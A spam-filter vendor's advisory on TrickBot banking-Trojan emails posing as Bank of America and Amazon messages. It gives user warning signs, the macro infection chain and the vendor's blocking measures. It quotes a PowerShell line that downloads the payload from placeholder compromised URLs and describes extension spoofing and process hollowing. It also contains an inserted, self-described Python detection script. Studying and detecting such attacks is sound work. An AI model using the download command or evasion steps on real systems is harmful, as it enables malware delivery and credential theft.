TrickBot Trojan in Fake Bank of America and Amazon Email

We’re blocking a “Trickbot” Banking Trojan for our global customers. The malware is delivered via fake Bank of America and Amazon email attachments. Trickbot has been targeting other countries and is now hitting U.S. banks using the Necurs botnet. Once installed, a Banking Trojan runs without you knowing it, stealing your login and password when you visit a recognized bank website. It can then steal your other information, your identity and your money.

With threat investigator Greg C. and threat analyst Todd S.

How to Recognize This Email Spam

Be careful if you receive an email like one of the following that appears to be from Bank of America or Amazon:

Fake Bank of America email infects your computer with the TrickBot banking Trojan

Fake Amazon email infects your computer with the TrickBot banking Trojan

There are several threat indicators that, taken together, should make you very suspicious:

No Personal Info
There is no personally identifying information in the email (e.g., your name, your account number, etc.). However, even an email that includes such info can still be spam, for example, in a spear-phishing attack.
Suspicious "Click-Me" Link
If you hover over the link that the email wants you to click, your browser window displays the destination URL (usually at the bottom of the browser window). In this case, you’ll see that it does NOT go to Bank of America, Amazon, or wherever the email is pretending to be from. Again, be careful. Spammers can make a link look similar to the real URL, so that many people won’t notice the difference. That’s why it is never safe to click the link in an email. If you need to check your online account, type the address you already know and trust in your browser.
Suspicious Attachment
Most legitimate banks and companies won’t ask you to open an attachment. Also, the attached document is not password protected and the message is not encrypted.
Urgency or Deadline
A lot of spam uses an old social engineering trick, creating a false sense of urgency so you act without thinking. This can also be done with a fake deadline. These emails are a little more subtle in that regard. The Bank of America one simply indicates that the message will expire in 90 days. The Amazon one says that your order is being prepared for shipment, which looks designed to get the recipient to act before it is shipped (and possibly too late for a refund).

Malicious Attachment Infects Your System

Do NOT download or open the document attached to the email. It contains malicious code that will automatically start a chain of events, infecting your machine with the Trickbot Trojan. You won’t even know it’s happening. Our email security professionals opened two of them in a safe controlled environment. Here is what those look like:

Fake Bank of America email attachment infects your computer with the TrickBot banking Trojan

Fake Amazon email attachment infects your computer with the TrickBot banking Trojan

How the Trojan Infects Your Computer

A macro embedded in the attached Word doc infects your computer using multiple steps and other obfuscation techniques. First, it downloads what appears to be an image file (let’s call it “FileA.png”) from a malicious or hacked website. To do that without being detected:

  1. The macro initiates a Windows command shell process (cmd.exe) on your computer that itself runs a PowerShell process (powershell.exe).
  2. The PowerShell process initiates a second Windows command shell that runs a second PowerShell process.
  3. The second PowerShell process grabs FileA.png from the compromised website and saves it as an exe file (which we’ll call “FileA.exe”). If it can’t get the png file from that URL, it tries a second website.
Obfuscation Note
FileA.exe is a “packed” executable file, which hides it from signature-based antivirus scanning during the download. Also, the source file’s “.png” extension will let it bypass antispam filters that block files with ".exe" extensions and don't look at the file data itself. It might also bypass web proxy firewalls that are blocking downloads by file extension and can look harmless in web proxy logs if the MIME type of the file is not checked and logged.

The command in the second PowerShell process that actually downloads the png file has this syntax (where fitt is the macro’s own download helper):

try{fitt('http://<compromised-url>/FileA.png')}catch{fitt('http://<compromised-url2>/FileB.png')}

The second PowerShell process then runs FileA.exe, which unpacks itself to a second executable (we’ll call it “FileB.exe”).

FileB.exe then uses another obfuscation technique, called "process hollowing", to hide its malicious activity. It starts a legitimate Windows process called "svchost.exe" in a suspended state (so it won’t run yet). Then FileB.exe replaces the code inside the legitimate svchost.exe with the Trojan’s code and runs the now malicious svchost.exe process.

You’ll probably never notice any of this is happening on your computer.
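The chain above gives a defender three things to look for: an Office application spawning nested cmd.exe/powershell.exe processes, a download whose ".png" name does not match its file contents, and an svchost.exe that was not launched by services.exe (the normal launcher of svchost on Windows). The following Python script is an added example, not code from the original post or from SpamStopsHere; it runs each check over constructed sample data. The process records, the file paths, the FileA.exe/FileB.exe names and the field layout (loosely modelled on a Sysmon process-creation event) are all assumptions made for the example.

```python
"""Defender-side heuristics for the TrickBot macro delivery chain.

Three checks, each run over constructed sample data (not real telemetry):
  1. A shell chain (cmd.exe -> powershell.exe -> cmd.exe -> powershell.exe)
     whose ancestor is an Office application such as WINWORD.EXE.
  2. A download named ".png" whose first bytes are the "MZ" magic of a
     Windows executable (the FileA.png / FileA.exe trick).
  3. An svchost.exe whose parent is not services.exe (process hollowing
     of a suspended svchost started by the dropper).
Field names are modelled loosely on Sysmon Event ID 1 and are assumptions.
"""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image")

# Constructed process-creation events for this example (pids are invented).
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\System32\wininit.exe"),
    ProcEvent(50, 1, r"C:\Windows\System32\services.exe"),
    ProcEvent(60, 50, r"C:\Windows\System32\svchost.exe"),  # benign svchost
    ProcEvent(100, 1, r"C:\Windows\explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(600, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(700, 600, r"C:\Users\victim\AppData\Local\Temp\FileA.exe"),  # assumed path
    ProcEvent(800, 700, r"C:\Users\victim\AppData\Local\Temp\FileB.exe"),  # assumed path
    ProcEvent(900, 800, r"C:\Windows\System32\svchost.exe"),  # hollowed svchost
    ProcEvent(950, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),  # admin use
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from `pid` up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def office_shell_chains(events, min_shells=2):
    """Check 1: shells nested at least `min_shells` deep under an Office app.
    Returns (pid, chain) for every shell process inside such a chain."""
    hits = []
    for e in events:
        chain = ancestry(events, e.pid)
        depth = 0  # number of contiguous shells from this process upward
        for name in chain:
            if name not in SHELLS:
                break
            depth += 1
        if min_shells <= depth < len(chain) and chain[depth] in OFFICE_APPS:
            hits.append((e.pid, chain[: depth + 1]))
    return hits


def content_mismatch(filename, data):
    """Check 2: declared extension vs. magic bytes. Returns a reason or None."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        actual = "png"
    elif data.startswith(b"MZ"):
        actual = "exe"
    else:
        return None  # unknown type: nothing to compare against
    if actual != ext:
        return f"{filename}: declared .{ext} but content is a {actual}"
    return None


def orphan_svchost(events):
    """Check 3: svchost.exe not launched by services.exe. Returns (pid, parent name)."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) != "svchost.exe":
            continue
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else "<unknown>"
        if parent_name != "services.exe":
            hits.append((e.pid, parent_name))
    return hits


if __name__ == "__main__":
    for pid, chain in office_shell_chains(SAMPLE_EVENTS):
        print("nested shell chain:", pid, " <- ".join(chain))
    # Constructed bytes: a file named like an image that begins with the PE magic.
    print(content_mismatch("FileA.png", b"MZ\x90\x00\x03\x00" + b"\x00" * 58))
    for pid, parent in orphan_svchost(SAMPLE_EVENTS):
        print("svchost with unexpected parent:", pid, parent)
```

The content check is the one a mail gateway or web proxy can apply at download time: it ignores the ".png" name and the MIME header and looks at the bytes, which is exactly what the post says the evaded filters do not do. The svchost parent check is a heuristic that needs tuning on a real fleet, since a few legitimate Windows components also start svchost.exe; treat its hits as leads to confirm, not verdicts.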

How the TrickBot banking Trojan infects your computer

How the Trojan Steals Your Login and Password

When you visit a banking website targeted by Trickbot, the Trojan injects code into the process running your browser. It sends your login username and password to the attacker’s command and control (CnC) servers. Armed with login credentials, the attacker can get other information in your account (e.g., to sell it or steal your identity) and possibly steal your money.

Most people won’t know what is happening and cannot easily figure it out. The Trojan keeps a live connection to your bank’s website while you’re on it, even displaying the bank’s URL and actual digital certificate in your browser’s address bar. This is different from a phishing scam where the attacker sends you to a fake website that you can often detect by the suspicious URL and other visual differences from the real website. However, in this case, you go to and remain on your bank’s website.

How We Block this Trojan

We are blocking this TrickBot banking Trojan for our global customers with several filters, depending on the specific email that is sent to them. There is at least one content filter and multiple phrase filters. We have also blocked one or more sender domains.

About SpamStopsHere

To find out more about SpamStopsHere, visit our product page, check out our simple pricing and start a FREE 30-Day trial, or contact us anytime via phone (800-458-3348 | 734-426-7500), chat or email. We're always here. 24/7/365.

Try SpamStopsHere Today!